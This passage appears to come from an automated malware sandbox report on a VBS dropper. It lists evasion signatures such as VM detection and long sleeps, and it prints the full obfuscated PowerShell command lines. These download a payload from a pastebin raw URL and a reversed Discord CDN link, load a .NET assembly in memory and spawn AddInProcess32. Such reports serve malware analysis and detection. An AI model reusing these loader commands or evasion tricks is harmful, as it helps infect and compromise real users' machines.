Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34390FC5 sldt word ptr [eax] 4_2_00007FFD34390FC5
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1754 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1540 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4006 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5751 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4324 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4295 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596 Thread sleep count: 4006 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832 Thread sleep count: 5751 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep time: -21213755684765971s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720 Thread sleep count: 4324 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996 Thread sleep count: 4295 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4780 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.2129598783.000001F1066AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: powershell.exe, 00000004.00000002.2309229890.0000023053043000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: powershell.exe, 00000007.00000002.2236285577.0000020D7E618000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: powershell.exe, 00000004.00000002.2373219888.0000023069B0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 00000006.00000002.2193420463.000001F70D5C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bo?hy?zqb3?g0?i??9?c??jw?w?cc?i??7?cq?zwby?hg?cwb0?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gc?ywbi?gg?a??g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?zwbj?gi?a?bo?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?m?dq?mgbk?gi?ygbk?gu?ygbl?du?nwbj?gi?nwbk?gq?yqbk?dq?zq?4?gi?o??x?dg?zq?1?dc?yqbj?dk?oq?5?dg?oqbm?gm?mgbi?dk?yg?2?dm?oq?x?ge?nq?1?gi?m?bi?di?z?bm?gq?zq?4?gu?z?bk?gq?nqbl?de?pqbt?gg?jgbh?gu?m??z?di?mg?3?dy?pqbz?gk?jgbh?dy?mg?4?dm?mg?3?dy?pqb4?gu?pwb0?hg?d??u?di?zqb0?hm?zq?v?dm?mq?x?dc?m??4?dy?n??0?di?mg?x?d??ng?z?dk?oq?y?de?lw?x?di?nw?4?du?o??3?di?nq?4?dk?m??x?dg?mw?3?dg?mq?x?c8?cwb0?g4?zqbt?gg?ywbh?hq?d?bh?c8?bqbv?gm?lgbw?h??yqbk?hi?bwbj?hm?aqbk?c4?bgbk?gm?lw?v?do?cwbw?hq?d?bo?cc?i??s?c??j?bn?hi?e?bz?hq?i??s?c??jwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?gg?dgbl?hc?bq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.r
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$hvewm = '0' ;$grxst = 'c:\users\user\desktop\segura.vbs' ;[byte[]] $gcbhh = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($gcbhh).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat text
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 